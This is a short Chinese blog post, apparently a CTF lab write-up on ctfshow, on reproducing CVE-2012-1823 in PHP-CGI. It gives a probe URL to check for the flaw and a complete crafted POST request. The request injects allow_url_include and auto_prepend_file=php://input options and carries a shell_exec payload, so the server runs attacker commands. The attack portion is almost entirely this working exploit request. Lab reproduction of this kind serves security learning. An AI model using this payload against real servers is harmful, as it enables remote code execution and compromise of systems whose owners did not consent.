CVE-2012-1823

搬砖的小木匠

 关注

阅读 111

2022-01-05

CVE-2012-1823详细介绍
漏洞复现(靶场为ctfshow)
利用

http://url/index.php?-s

判断是否存在漏洞
若出现源码组存在
bp抓包按下面修改

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

发送后会出现id
在这里插入图片描述
表明利用成功

相关推荐

漏洞分析丨cve-2012-0003

梦幻之云 104 0 0

漏洞分析丨CVE-2012-1873

云卷云舒xj 82 0 0

漏洞丨实例分析cve2012-0158

_铁马冰河_ 163 0 0

修复漏洞Windows 2012 Server R2(CVE-2016-2183)、(CVE-2015-2808)、(CVE-2013-2566)

猫er聆听没落的旋律 23 0 0

复现goby——CVE-2012-2122(Mysql 身份认证绕过)

上古神龙 60 0 0

Luck and Love HDU - 1823

彭维盛 69 0 0

1823_ChibiOS的调试功能

杏花疏影1 82 0 0

Windows Server 2008或2012 修复CVE-2016-2183(SSL/TLS)漏洞的方法

爱情锦囊 169 0 0

struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly

caoxingyu 58 0 0

HDU 1823 Luck and Love 二维线段树

猫er聆听没落的旋律 86 0 0

精彩评论(0)

0 0 举报